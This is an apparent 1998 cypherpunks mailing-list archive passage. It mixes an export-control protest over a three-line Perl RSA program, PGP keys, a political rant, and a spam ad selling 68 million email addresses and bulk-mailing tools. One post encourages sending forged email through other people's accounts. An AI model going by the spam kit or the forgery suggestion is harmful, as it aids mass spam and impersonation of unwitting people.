 Date: Fri, 13 Mar 1998 19:04:46 -0700
 From: bill payne <billp@nmol.com>
 X-Mailer: Mozilla 3.03 (Win95; I)
 MIME-Version: 1.0
 To: taocp@cs.stanford.edu, lawya@lucs-01.novell.leeds.ac.uk,
         merata@pearl.sums.ac.ir, wir@monkey-boy.com, cypherpunks@toad.com,
         ukcrypto@maillist.ox.ac.uk, cyberia-l@listserv.aol.com
 CC: merata@pearl.sums.c.ir, lawya@lucs-01.novell.leeds.ac.uk,
         sjmz@hplb.hpl.hp.com, wmadsen@explorerer.csc.com
 Subject: taocp v3 p32
 Content-Type: multipart/mixed; boundary="------------66B76F3BBA4"
 Sender: owner-cypherpunks@toad.com
 Precedence: bulk
   >>

Unsubscribe me from this list.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jo.dfr.567a@msn.com
Date: Sat, 14 Mar 1998 08:55:23 -0800 (PST)
To: sq9.vbc3e5z@msn.com
Subject: 68 Million Email Addresses - $99
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


          68 MILLION
 EMAIL ADDRESSES
 FOR ONLY $99 
       

 You want to make some money? 

 I can put you in touch with over 60 million people at virtualy no cost.

 Can you make one cent from each of theses names?

If you can you have a profit of over $600,000.00 

This offer is not for everyone. 

If you can not see the just how excellent the
 risk / reward ratio in this offer is then there is nothing I can do for you. 

To make money you must stop dreaming and TAKE ACTION.


****************************************

PACKAGE  A

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!

$99.00

****************************************

PACKAGE B

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

$ 139.00

****************************************

PACKAGE  C

THE WORKS

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

             AND 

Over 500 diferent Business Reports

now being sold on the internet for up to

$100 each. You get full rights to resell these reports.

With this package you get the email addresses, 

the software to mail them AND ready to sell  information products.

AND ...... 

. a collection of the 100 best money making

adds currently floating around on the internet.

$ 189

****************************************

SEVERAL WAYS TO ORDER !!!

IF YOU ORDER BY PHONE WE WILL SHIP YOUR CD CONTAINING THE 68 MILLION + NAMES WITHIN 12 HOURS OF YOUR ORDER!!!

 
  1) WE ACCEPT:  AMERICAN EXPRESS OR
    
                               VISA <> MASTERCARD
 
     TYPE OF CARD  AMX / VISA / MC??_______________

      EXPIRATION DATE   ___________________________
 
     NAME ON CREDIT CARD________________________
 
     CREDIT CARD #________________________________
 
     BILLING ADDRESS ____________________________
 
     CITY_________________________________________
 
    STATE________________ZIP_____________________
 
   PHONE INCLUDE AREA CODE___________________
   
    EMAIL ADDRESS______________________________ 

        WE WILL BILL selected amount to your account plus the following shipping costs

        SHIPPING  COST OF 3.85 FIRST CLASS MAIL

        SHIPPING COST OF  15.00  24 HOUR EXPRESS MAIL /  FEDERAL EXPRESS
 
        SALES TAX (7.25%) added to CA residents 
 
  >>> Send correct amount in cash, check or money

order to:

  >>> ELECTRIC EMAIL
  >>> 702 Mangrove Avenue, Suite 151
  >>> Chico, CA 95926


  2) Send the same above requested credit card 

information to above address. 


   3) Fax the same above credit card information to 530-895-

8470

   4) Call phone # 530-876-4291.  This is a 24 hour phone 

number to place a CREDIT CARD order.

   5) FAX A COPY of your signed check to 530-895-8470.

       This is an EXCELLENT way to order without a credit card!



Electric Email is a private company and is not affiliated with, or endorsed by, AOL, MSN, or any other Internet Service Provider.

Copyright 1998

All rights reserved

Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof, or abridging the freedom of speech 
or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances.         
    
Amendment I, The US Constitution                                                                :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: y0                                  @aol.com
Date: Sat, 14 Mar 1998 08:04:47 -0800 (PST)
To: y0                                  @aol.com
Subject:  
Message-ID: <199803141603.KAA30350@marki.compu.net>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><h1><B>- Click -</B></b><p><p><p><p><p><p><p><p><p></FONT></PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jared" <cutey-jared@mailcity.com>
Date: Sat, 14 Mar 1998 10:37:22 -0800 (PST)
To: cryptography@c2.net
Subject: New Website is up!!
Message-ID: <AMCMHFHNEKAABAAA@mailcity.com>
MIME-Version: 1.0
Content-Type: text/plain


New Web page up at HTTP://WWW.INSTANTWEB.COM/~SALEM/

CHECK IT OUT!! 


THANKS!!


			-CypherPunks 



Get your FREE, private e-mail
account at http://www.mailcity.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "simon" <potnoodle@fastnet.co.uk>
Date: Sat, 14 Mar 1998 09:40:22 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: ANSWERS
Message-ID: <199803141738.RAA22094@ns0.fast.net.uk>
MIME-Version: 1.0
Content-Type: text/plain


have you got a hacker and if you have would you mind if you could send over
to me?
WE ARE DESIGNING A HACKING SYSTEM FOR WORLD WIDE USE AND WONDERED IF YOU
COULD HELP IN THE DESIGNING OF IT
IF SO PLEASE SEND AN E-MAIL TO US AND WE WILL SEND YOU SOME VALUABLE OTHER
HACKING SOFTWARE









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 14 Mar 1998 15:50:49 -0800 (PST)
To: Declan McCullagh <declan@well.com>
Subject: Re: time to export RSA and demand to be prosecuted? (Re: Cypherpunks Crypto_Legal Assistance Fund)
Message-ID: <1.5.4.32.19980314235201.00690500@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan wrote:

>If anyone chooses to try this act of civil disobedience, let me know and
>I'll write about it. But be warned: the Department of Commerce has
>approximately 60 special agents who enforce violations of export rules.
>These are federal police officers, stationed in field office around the
>U.S., with badges and arrest power, trained at FLETC in Georgia. They don't
>have a sense of humor about these things.

Well, yes, that's what BXA flaunts, but I wonder if the encryption regs
are a high priority compared to the cases which are actually pursued
which deal with truly threatening technology that every congressperson
loves to fearfully hate. Yapping Chihuahua crypto is not up there yet, 
I suspect.

True, there's a batch of agents being trained to work specifically on
encryption, and with the total of crypto exports now exceeding $half a 
billion, it may be cost and politically effective to set an example by 
pounding one or two neo-crypto-Zimmermanns, especially as the
year's hearings rumble, troll and slumber.

Still, Adam's signature RSA-taunt has been on our Web site for months,
terminating each of his exemplary stream of messages on low perfidy 
in high places, to no effect on BXA's eagle eyeball.

Adam's 3-liner was also once part of Peter Junger's legal filings 
<http://jya.com/pdj4.htm> (DoJ downloaded the evidence) until we 
were ordered to excise the tiny terrible Perl so that Peter's noble 
bite of the hand of god would be clearly his stiletto fangs and not 
confused with Sir Adam Bulldog's ass ripper.

Now, Declan, what would a crypto-miscreant need to do to actually get 
BXA's fierce kennel of crypto bloodhounds' attention, to make it truly
worth everybody's headline read, money, politics, talents and teeth?

By Tuesday, when Cindy Cohn sticks her head in the beast's mouth.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Six <ualdv8@sk.sympatico.ca>
Date: Sat, 14 Mar 1998 17:33:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: In Your EAR...
Message-ID: <350B306B.1B7C@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


In Your EAR, Shit-For-Brains
----------------------------
  In continuation of a tradition begun on Dec. 7, 2041 A.D.
EARMonger InterpretPrizes would like to extend an invitation 
to those who wish to participate in a clear violation of the
U.S. EAR regulations of your current time period.
  The StarShip CowBoy, descended from the lineage of the
Author, would be more than happy to ensure that your violation
of EAR regulations extends not only across the physical and
political geographically-based space continuum, but also across
a range of the time continuum which begins before EAR was an
unborn seed in the mind of The RAT, continues throughout its
journey from the mind, through the digestive system, its
physical manifestation as droppings from The RAT, its further
evolution through the reproductive systems of various insects
and vermin, right up to the time that The RatFucker returned
it to its rightful place, placing it back in the mind of
The Rat, as a seed placed in The Rat's EAR.

"The more things change, the more they remain insane..."
~ The Author

  To participate, one only need to send the following:

print pack"C*",split/\D+/,`echo
"16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`

to the Monger of their choice, in any given space-time continuum,
with instructions as to where the person would like to have this
officially unexportable (under U.S. EAR regulations) cryptographic
code forwarded.
  Whatever legally unexportable code you choose to send will be
routed through U.S. servers to their ultimate destination.

  Two PGP Keys are included below, for those who wish to disguise
their original message in order to maintain deniability (in the
case that the message is intercepted by the Sixual Deviate, who
would undoubtedly insert child-pornography into the message), 
to force those choosing to monitor and/or enforce EAR regulations
to jump through the maximum number of hoops to pursue their March
To Madness, or to hide the communication from your mother (who 
would undoubtedly smack your nasty bottom if she knew what you
were doing through your little sister's email account).

  Suggestions for final destinations for your illegal and
prosecutable communication:
~To yourself, at both U.S. and foreign email server sites.
~To your immediate family members at U.S. and foreign email
  server sites.
~To foreign embassies of U.S. allies.
~To foreign embassies of U.S. enemies.
~To U.S. embassies in foreign countries.
~To foreign government email addresses, with instructions
  for delivery to individuals presently incarcerated for
  terrorist crimes.
~To anywhere you damn well please...

  In the interests of making the whole process as convoluted
and ridiculous as possible, it is suggested that you make
your communications as much of a mixed-bag as you can imagine.
  e.g. - Some legal, some illegal, some attributed to yourself
or others, some to be forwarded anonymously, some sent via
routes that are easily traceable, some sent through routes
that are difficult to trace, some sent from your own machines
and email accounts, some through the machines and accounts
of others (obvious forgeries are welcomed).

  All communications received by A Monger To Remain Unnamed
Later But Everyone Knows Who It Is by April 1, 1998 will be
forwarded on A Date Which Will Remain A Mystery , at exactly
9:02 CST, regardless of whether or not they are obviously 
spook-originated missives designed to provide proof of 
criminal activity.

  This once-in-many-lifetimes offer is being extended as part
of a Man On The Digital Street survey aimed at answering the
question: "Does anyone really know what time it is?"
  The question you might ask yourself, is: "Does anyone 
really care?"  

  When you think of 'Chicago'--think of Abbey Hoffman.

A. F(r)iend


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Business Security 5.5

mQENAzZsmI4AAAEIANHHMhV7V8WqPO6RjjfhZbeY/e6hsjAjKckU7YAYPhHiJfqG
xw5+PgVjRPhIpXEE8ksmzZBzyH5KLW5GKFJZoD6YvVUSuzm+Gpxv+G78sBDBljUt
BUoaB0XM4HSjEuqZtRtva+l+MAr3tFrK8FSdCsSgjQa8oOT5yFE76hgOGOkXGDKC
HAISINKdduNsp4PU6HiNoKMdYpCCvK5u08lQFcByare2yaYmawYLmCzheCWLv9F/
kvnFtXCjup/pQNcOVeb/FkDx42l4vMwiWTH+AvrsjsV1njUIi9DTmcmD4doPlzBS
qgbvQiTa16T2E4wJlnmATuW3QdwuBbdT2FSgj3MABRG0F0Vhck1vbmdlciA8ZW1A
ZGV2Lm51bGw+iQEVAwUQNmyYjgW3U9hUoI9zAQHjNgf+KIDuWoBvfUj4H1twHvYU
+IeDWIApLDnHkR7tsalLi9jY345iAolt3a/CiYxXPtjy9yedSaKoPasuvQk2cZ6e
LZZwgEfDYj1GvjLC9D1rSItLLl6aDqYfhN2D2wgnB4mJssx1NP9zLQRf8aJkbDnl
BMy3kfTr6ANmwe1hRGFWiuLkhnEtKzc9TFxBtx+4bx66rBBTzSUBfynH35bCLHLw
hVzWGc5A0F18LG2WRLbGa/LcEXjp35jHyrJV73t2gUwVjH5qGa0B5O0dpvK9yDR9
wutFrmuhRgfqHO5Tclp470dkQFJv6HHMrSYyjRFFtyC9A+5Fvd1WkW7oLRAUxZmm
HQ==
=wU9D
-----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Business Security 5.5

mQGiBDSLZQsRBADXuA1EJfGhAFVBUP7O6RsBa3EwKKjS19cQlg83nXoo1Pueh4p0
DhD5Mi2V/y4LpWRSRTBpsi54tnC/KQOjze2e6lKS/ERD8R+0umbnqQEiuBamskx/
SsiEWkhHSY2JPxkffPs4IBxCt9IKjCT//iIRIstbwfS0XHkH1s9euuueRwCg/zxp
7ON8OfcMyWWgk/2E2BGC+mUD/RMq7ijYM10gUCn/F5kTZHrDGs9899XTTE1OBd7n
FdLesISWPPjyroMTKaa8D6gW6zMpyuA5UMxPVNwoTUzM+N4qh7dzgOL3Zf4WgZoh
6dcdCuZ+fu5Sjni3BgWqnxWweC1+yDcXwp8WD/OcXkGshWr5pdAX2b8tzNw5tHMh
dx4RBACEq9R81h8/s0oDuwaRXfyIWLyInGy+QyTdG+UbojFXR3cBMJFy8AVhRXd/
Jqn4JLRSegEZlSaYhjkS8LYrIj2Hxf4Bc/KaAzgl5DYeDsOcRcx6AXAneIr34KAq
VNL9H+HyphRbkbWpiBgFT4lDcjbDGZ5pVYEG1gzRG6SmnP4XkbQXRWFyTW9uZ2Vy
IDxlbUBkZXYubnVsbD6JAEsEEBECAAsFAjSLZQsECwMBAgAKCRAkfjoNeUg+6vco
AKCf9cP91P4G+qSgOTV06ttt13TTPQCcCpNhZ0gpvUeQp/tJ963CH+8oJce5Ag0E
NItlCxAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQ
B8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F
/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280g
tJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0Oj
HRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9
ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIIAL0fd6dD7q1m9wDlyMXczadMUJIi
N6utCxDkxknURZhiGSBiRRDC1+5gvg1T896UijVN1gGviZs3PHAkwVnbZwM2I6cn
2hSF8MnJMDjI5pxPGCX/ABcUPUUSXOtWOWR/pMpbj4NvV6UClwVtMNK8s1E9B6+u
0is1FHjzQC0jxSbvpHJKuX2iQjkvtO+0BdkxCe7JO3ID5h4bb8W8Tdw4hjsQVeBm
b+M8bDqKOxsBMqHp2ydvx/x1qEHhrCxMDPPRSfPHj1MJSTQB1T2Nt0/7yL6D14m6
h1mF3vV3ajsfKEDCRU0pyy7meqkXPABYrnFLLnHUCmtZatOK7q6IBDpPlD+JAEYE
GBECAAYFAjSLZQsACgkQJH46DXlIPuopoACfSBsIgXRfMGJ9Tbuj03vHhEj8hRcA
nj19dKu1fTDXtbSAJ7sEK+NeRE/t
=uqgm
-----END PGP PUBLIC KEY BLOCK-----


Subject: 
        time to export RSA and demand to be prosecuted? (Re: Cypherpunks
Crypto_Legal Assistance Fund)
  Date: 
        Sat, 14 Mar 1998 21:27:54 GMT
  From: 
        Adam Back <aba@dcs.ex.ac.uk>
    To: 
        ravage@ssz.com
    CC: 
        cypherpunks@cyberpass.net, frissell@panix.com



Jim Choate <ravage@ssz.com> writes:
> Perhaps it's time, in regards testing crypto law, to do exactly what
> Tim May proposes - premeditated actions intended to force either a
> clear refusal to prosecute on the part of the government or else a
> clear abstinance on their part to prosecute.
> 
> It's obvious that no individual has the legal where withal who is
> also willing to do this. 

Some of the people on the list are lawyers, perhaps they could do it
and represent themselves, or represent others.  Duncan Frissell has
some opinions on this I think.  If I recall his previous statements on
this topic have included that Phil Zimmermann ought to hire a troupe
of dancing elephants to make a noise and force the Feds to prosecute.
(Duncan considered the Feds would loose).

On a practical matter of what to export... may I suggest exporting
this:

print pack"C*",split/\D+/,`echo
"16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`

Peter Junger got an official decision from the US commerce department
that this was not exportable under the EAR regulations.

Do we have a volunteer?

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo
"16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`



Subject: 
           Re: time to export RSA and demand to be prosecuted? (Re:
Cypherpunks Crypto_Legal Assistance
           Fund)
      Date: 
           Sat, 14 Mar 1998 17:30:03 -0500
      From: 
           Declan McCullagh <declan@well.com>
        To: 
           Adam Back <aba@dcs.ex.ac.uk>
       CC: 
           cypherpunks@cyberpass.net
References: 
           1 , 2


At 21:27 +0000 3/14/98, Adam Back wrote:
>Peter Junger got an official decision from the US commerce department
>that this was not exportable under the EAR regulations.
>
>Do we have a volunteer?

If anyone chooses to try this act of civil disobedience, let me know and
I'll write about it. But be warned: the Department of Commerce has
approximately 60 special agents who enforce violations of export rules.
These are federal police officers, stationed in field office around the
U.S., with badges and arrest power, trained at FLETC in Georgia. They
don't
have a sense of humor about these things.

-Declan


FLETC / Georgia
Department of Commerce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@dev.null>
Date: Sat, 14 Mar 1998 18:22:48 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: time to export RSA and demand to be prosecuted? (Re:Cypherpunks Crypto_Legal Assistance Fund)
In-Reply-To: <1.5.4.32.19980314235201.00690500@pop.pipeline.com>
Message-ID: <350B53E8.B54@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
> Now, Declan, what would a crypto-miscreant need to do to actually get
> BXA's fierce kennel of crypto bloodhounds' attention, to make it truly
> worth everybody's headline read, money, politics, talents and teeth?

What we are talking about, in terms of 3-lines of legally 
unexportable code, is 'Dick Wars'.
If one were to make certain that a wide range of members of Congress,
Senators, BXA and Department of Commerce officials, etc., were to
receive an email with a Subject: "I'm Pissing In Your EAR" and a
message body providing details of their crypto-miscreantizing, then
the inappropriate authorities would be hard-pressed to ignore the
stream (pardon the pun) of ridicule that would result in their
tyrannical, unconstitutional bluff being called.

Richard Monger
Nuclear Pississist and Master Baiter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Sat, 14 Mar 1998 17:29:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Remove me.
Message-ID: <c602e056.350b2eea@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan wrote:

>If anyone chooses to try this act of civil disobedience, let me know and
>I'll write about it. But be warned: the Department of Commerce has
>approximately 60 special agents who enforce violations of export rules.
>These are federal police officers, stationed in field office around the
>U.S., with badges and arrest power, trained at FLETC in Georgia. They don't
>have a sense of humor about these things.

Well, yes, that's what BXA flaunts, but I wonder if the encryption regs
are a high priority compared to the cases which are actually pursued
which deal with truly threatening technology that every congressperson
loves to fearfully hate. Yapping Chihuahua crypto is not up there yet, 
I suspect.

True, there's a batch of agents being trained to work specifically on
encryption, and with the total of crypto exports now exceeding $half a 
billion, it may be cost and politically effective to set an example by 
pounding one or two neo-crypto-Zimmermanns, especially as the
year's hearings rumble, troll and slumber.

Still, Adam's signature RSA-taunt has been on our Web site for months,
terminating each of his exemplary stream of messages on low perfidy 
in high places, to no effect on BXA's eagle eyeball.

Adam's 3-liner was also once part of Peter Junger's legal filings 
<http://jya.com/pdj4.htm> (DoJ downloaded the evidence) until we 
were ordered to excise the tiny terrible Perl so that Peter's noble 
bite of the hand of god would be clearly his stiletto fangs and not 
confused with Sir Adam Bulldog's ass ripper.

Now, Declan, what would a crypto-miscreant need to do to actually get 
BXA's fierce kennel of crypto bloodhounds' attention, to make it truly
worth everybody's headline read, money, politics, talents and teeth?

By Tuesday, when Cindy Cohn sticks her head in the beast's mouth.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Sat, 14 Mar 1998 18:18:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: A little Paranoid, PUNKS?
Message-ID: <758c3e85.350b3a58@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-14 21:03:56 EST, ualdv8@sk.sympatico.ca writes:

<< -----BEGIN PGP PUBLIC KEY BLOCK-----
 Version: PGP for Business Security 5.5
 
 mQENAzZsmI4AAAEIANHHMhV7V8WqPO6RjjfhZbeY/e6hsjAjKckU7YAYPhHiJfqG
 xw5+PgVjRPhIpXEE8ksmzZBzyH5KLW5GKFJZoD6YvVUSuzm+Gpxv+G78sBDBljUt
 BUoaB0XM4HSjEuqZtRtva+l+MAr3tFrK8FSdCsSgjQa8oOT5yFE76hgOGOkXGDKC
 HAISINKdduNsp4PU6HiNoKMdYpCCvK5u08lQFcByare2yaYmawYLmCzheCWLv9F/
 kvnFtXCjup/pQNcOVeb/FkDx42l4vMwiWTH+AvrsjsV1njUIi9DTmcmD4doPlzBS
 qgbvQiTa16T2E4wJlnmATuW3QdwuBbdT2FSgj3MABRG0F0Vhck1vbmdlciA8ZW1A
 ZGV2Lm51bGw+iQEVAwUQNmyYjgW3U9hUoI9zAQHjNgf+KIDuWoBvfUj4H1twHvYU
 +IeDWIApLDnHkR7tsalLi9jY345iAolt3a/CiYxXPtjy9yedSaKoPasuvQk2cZ6e
 LZZwgEfDYj1GvjLC9D1rSItLLl6aDqYfhN2D2wgnB4mJssx1NP9zLQRf8aJkbDnl
 BMy3kfTr6ANmwe1hRGFWiuLkhnEtKzc9TFxBtx+4bx66rBBTzSUBfynH35bCLHLw
 hVzWGc5A0F18LG2WRLbGa/LcEXjp35jHyrJV73t2gUwVjH5qGa0B5O0dpvK9yDR9
 wutFrmuhRgfqHO5Tclp470dkQFJv6HHMrSYyjRFFtyC9A+5Fvd1WkW7oLRAUxZmm
 HQ==
 =wU9D
 -----END PGP PUBLIC KEY BLOCK-----
 
 
 -----BEGIN PGP PUBLIC KEY BLOCK-----
 Version: PGP for Business Security 5.5
 
 mQGiBDSLZQsRBADXuA1EJfGhAFVBUP7O6RsBa3EwKKjS19cQlg83nXoo1Pueh4p0
 DhD5Mi2V/y4LpWRSRTBpsi54tnC/KQOjze2e6lKS/ERD8R+0umbnqQEiuBamskx/
 SsiEWkhHSY2JPxkffPs4IBxCt9IKjCT//iIRIstbwfS0XHkH1s9euuueRwCg/zxp
 7ON8OfcMyWWgk/2E2BGC+mUD/RMq7ijYM10gUCn/F5kTZHrDGs9899XTTE1OBd7n
 FdLesISWPPjyroMTKaa8D6gW6zMpyuA5UMxPVNwoTUzM+N4qh7dzgOL3Zf4WgZoh
 6dcdCuZ+fu5Sjni3BgWqnxWweC1+yDcXwp8WD/OcXkGshWr5pdAX2b8tzNw5tHMh
 dx4RBACEq9R81h8/s0oDuwaRXfyIWLyInGy+QyTdG+UbojFXR3cBMJFy8AVhRXd/
 Jqn4JLRSegEZlSaYhjkS8LYrIj2Hxf4Bc/KaAzgl5DYeDsOcRcx6AXAneIr34KAq
 VNL9H+HyphRbkbWpiBgFT4lDcjbDGZ5pVYEG1gzRG6SmnP4XkbQXRWFyTW9uZ2Vy
 IDxlbUBkZXYubnVsbD6JAEsEEBECAAsFAjSLZQsECwMBAgAKCRAkfjoNeUg+6vco
 AKCf9cP91P4G+qSgOTV06ttt13TTPQCcCpNhZ0gpvUeQp/tJ963CH+8oJce5Ag0E
 NItlCxAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQ
 B8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F
 /Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280g
 tJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0Oj
 HRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9
 ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIIAL0fd6dD7q1m9wDlyMXczadMUJIi
 N6utCxDkxknURZhiGSBiRRDC1+5gvg1T896UijVN1gGviZs3PHAkwVnbZwM2I6cn
 2hSF8MnJMDjI5pxPGCX/ABcUPUUSXOtWOWR/pMpbj4NvV6UClwVtMNK8s1E9B6+u
 0is1FHjzQC0jxSbvpHJKuX2iQjkvtO+0BdkxCe7JO3ID5h4bb8W8Tdw4hjsQVeBm
 b+M8bDqKOxsBMqHp2ydvx/x1qEHhrCxMDPPRSfPHj1MJSTQB1T2Nt0/7yL6D14m6
 h1mF3vV3ajsfKEDCRU0pyy7meqkXPABYrnFLLnHUCmtZatOK7q6IBDpPlD+JAEYE
 GBECAAYFAjSLZQsACgkQJH46DXlIPuopoACfSBsIgXRfMGJ9Tbuj03vHhEj8hRcA
 nj19dKu1fTDXtbSAJ7sEK+NeRE/t
 =uqgm
 -----END PGP PUBLIC KEY BLOCK----- >>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Sat, 14 Mar 1998 20:11:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: (no subject)
Message-ID: <49796d70.350b549b@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-14 23:01:01 EST, nobody@REPLAY.COM writes:

<< Sometime ago there was a post to the list which made more sense than
 all of the other finger-pointing posts, combined, which have proclaimed
 this-or-that entity to be a tentacle/testicle of one or another of the
 list members.
 The post was by someone claiming to be the "only" real member of the
 cypherpunks list. >>

Who was it, a "nobody?"  :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Sat, 14 Mar 1998 20:24:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Read about a REAL "Punk!"
Message-ID: <458a4c61.350b57d6@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Absolute Proof - Rush is a Liar!


First let's define 'liar' (from pages 670-671 of 'Merriam Webster's Collegiate
Dictionary, 10th
Edition')

"Liar - one that tells lies"

That was easy, now it's a little more confusing, because of the number of
definitions (4). The first
two I will leave out, as they pertain to how you might 'lie' down, or where a
golf ball may 'lie'. The
3rd is the verb, and is inapplicable. I will use the 4th definition, the noun.

(4) "Lie (noun)- 1: a: an assertion of something known or believed by the
speaker to be untrue
with intent to deceive b: an untrue or inaccurate statement that may or may
not be believed true
by the speaker 2: something that misleads or deceives 3: a charge of lying"

By combining the two definitions,

(4:1:a) 'Liar - one that tells assertions of somethings known or believed by
the speaker to be
untrue with intent to deceive'
(4:1:b) 'Liar - one that tells untrue or inaccurate statements that may or may
not be believed true
by the speaker'
(4:2) 'Liar - one that tells somethings that mislead or deceive'
(4:3) 'Liar - one that tells charges of lying'

I think that regular readers will now concede that subsense (4:1:b) proves
that his many 'errors'
can be classified as lies, and (4:2) certainly fits Rush! But for the sake of
proof, I will now
document more than one lie, with complete disreguard as to whether Rush knew
they were lies at
the time he said them, to prove it by subsense (4:1:b).

These examples from FAIR (Fairness & Accuracy In Reporting). Please e-mail
FAIR (at
fair-report@fair.org - it will be returned via e-mail) for the complete FAIR
report on Rush
Limbaugh, so you can see how Limbaugh responds to FAIR's reports of his lies
(Limbaugh's
so-called response (that he lauded so loudly (at the time)) is included also,
as well as FAIR's
counter-response). 


LIMBAUGH: On California contractor C.C. Myers completing repairs 74 days early
on the
earthquake-damaged Santa Monica Freeway: "There was one key element that made
this
happen. One key thing: The governor of California declared the [freeway] a
disaster area and by
so doing eliminated the need for competitive bids.... Government got the hell
out of the way." (TV
show, 4/13/94) "They gave this guy [Myers] the job without having to go
through the
rigmarole...of giving 25 percent of the job to a minority-owned business and
25 percent to a
woman." (TV show, 4/15/94)

REALITY: There was competitive bidding: Myers beat four other contractors for
the job.
Affirmative action rules applied: At least 40 percent of the subcontracts went
to minority or
women-owned firms. Far from getting out of the way, dozens of state employees
were on the job
24 hours a day. Furthermore, the federal government picked up the tab for the
whole job (L.A.
Times, 5/1/94).


LIMBAUGH: "There's no such thing as an implied contract." (Radio show, quoted
in FRQ,
Spring/93)

REALITY: Every first year law student knows there is.


LIMBAUGH: "Ladies and gentlemen, we now know why there is this institutional
opposition to
low tax rates in the liberal wing of the Democratic Party. It's because [low
tax rates] are biblical
in nature and in root. When you can trace the lowering of tax rates on grain
from 90 percent to 20
percent giving seven fat years during the days of Pharaoh in Egypt, why then
you are tracing the
roots of lower taxes and rising prosperity to religion.... You can trace
individual prosperity,
economic growth back to the Bible, the Old Testament. Isn't it amazing?"
(Radio show, 6/28/93)

REALITY: Amazingly wrong. Genesis 41 is about the wisdom of INSTITUTING taxes,
not
cutting them. After Pharaoh had a dream that prophesied seven fat years to be
followed by seven
lean years, Joseph advised him to "appoint officers over the land, and take up
the fifth part of the
land of Egypt in the seven plenteous years...and lay up corn under the hands
of Pharaoh." In
other words, a 20 percent tax on the grain harvest would put aside food for
use during the famine.
Pharaoh took Joseph's advice, and Egypt avoided hunger during the famine.


LIMBAUGH: "It has not been proven that nicotine is addictive, the same with
cigarettes causing
emphysema [and other diseases]." (Radio show, 4/29/94)

REALITY: Nicotine's addictiveness has been reported in medical literature
since the turn of the
century. Surgeon General C. Everett Koop's 1988 report on nicotine addiction
left no doubts on
the subject; "Today the scientific base linking smoking to a number of chronic
diseases is
overwhelming, with a total of 50,000 studies from dozens of countries," states
Encyclopedia
Britannica's 1987 "Medical and Health Annual."


LIMBAUGH: "Most Canadian physicians who are themselves in need of surgery, for
example,
